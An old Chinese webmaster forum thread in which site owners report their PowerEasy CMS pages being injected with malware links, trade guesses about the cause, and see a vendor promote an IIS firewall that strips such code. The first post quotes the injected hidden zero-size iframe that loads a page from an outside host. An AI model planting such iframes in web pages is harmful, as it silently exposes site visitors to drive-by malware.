最新挂马代码，第一个先报！

最新挂马代码，第一个先报！

我的站www.xzbaojia.com  www.yzbaojia.com  全被挂马了，代码如下：网站被挂马,大量的马,<iframe src="http://2rui.cn/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>,　所有的网页全被挂了，无一漏网，但特点跟以前不一样了，本次挂马，只挂了html文件，asp文件没有发现被挂，而且conn.asp也没感染，是不是对方仁慈啊？兄弟们，你们有发现吗，赶快举报啊。我建立了一个动易交流群，ＱＱ群：33010662　　大家有机会一起探讨。

评分

举报使用道具 TOP

gzwkx(ID: 117740)

• 
• 
• 
• 头衔: 新手上路

发表于: 2007-09-09 09:40:00 - IP:*.*.*.*

只看该用户大 中 小 沙发

我的网平均一个星期被挂一次木马,动易可能是天下最容易被攻击的系统了.现在我都懒的去修复了.

gzwkx的签名

美好旅程 伴你左右 [url=http://www.gzslw.com]http://www.gzslw.com[/url]

评分

举报使用道具 TOP

枫言风羽(ID: 78096)

• 
• 
• 
• 头衔: 新手上路

发表于: 2007-09-11 08:21:00 - IP:*.*.*.*

只看该用户大 中 小 板凳

楼上的说的在理，最近也是经常被挂马~~找不出原因，急

评分

举报使用道具 TOP

webboy(ID: 4)

• 
• 
• 
• 
• 头衔: 创始人
• 

发表于: 2007-09-11 08:38:00 - IP:*.*.*.*

只看该用户大 中 小 地板

检查机房是不是中了ARP病毒了。

webboy的签名

用心服务 共创价值

评分

举报使用道具 TOP

netguest(ID: 26653)

• 
• 
• 
• 头衔: 动易蜘蛛侠
• 

发表于: 2009-04-14 18:50:00 - IP:*.*.*.*

只看该用户大 中 小 第4楼

实时从IIS中清除HTML/ASP/PHP/ASP.NET网页“挂马”代码
　

    一个服务器中运行着 50 - 300 个WEB站点，由于WEB网站 ASP / PHP 等漏洞漏洞，很容易导致WEB网站被挂上“木马”代码连接。如何快速清除这样的木马“挂马”连接呢 ，又不用修改硬盘 ASP / PHP 文件呢？

 

    智创IIS防火墙从V3.70 版开始增加了一个网页“挂马”代码清除功能，可以非常方便的清除挂马代码，而不用修改硬盘 HTML / ASP / PHP / ASP.NET 文件，在清除挂马连接的同时，又可以避免修改用户文件，避免错误修改用户文件而发生纠纷。

 

　　清除＂挂马＂代码目前有３个方式 

• 智能识别标准HTML网页代码，对HTML/ASP/PHP/ASP.NET等网页的顶部和底部的“挂马特征”代码进行自动清除操作
  
• 使用＂原样＂模式清除，将需要清除的代码加入到 RepHtmlText.txt 文件中
  
• 使用＂正则表达式＂模式进行清除，可以自己定义“正则表达式”进行清除操作，使用范围更广

如下所示，WEB站点网页顶部和底部被人加入一些类似这样的代码

 

在防火墙配置文件中,加入需要清除的“挂马”代码连接，并启用“挂马”代码清除功能

 

相关“挂马”代码已经从IIS里清除

 

 

其他用途一，清除指定关键字功能

　　从HTML/ASP/PHP/ASP.NET网页清除任意内容，如实现关键字“清除”功能，将指定的关键字从HTML/ASP/PHP/ASP.NET网页里清除掉。

 

其他用途二，清除ASP/PHP木马HTML特征，是木马无法正常运行

　　从ASP/PHP文件里，找出一些常见的木马HTML特征，将指定的特征进行清除，使木马成为废品，从而无法正常运行。

 

软件下载和点这里　http://www.zcnt.com/guama.asp　查看详细说明……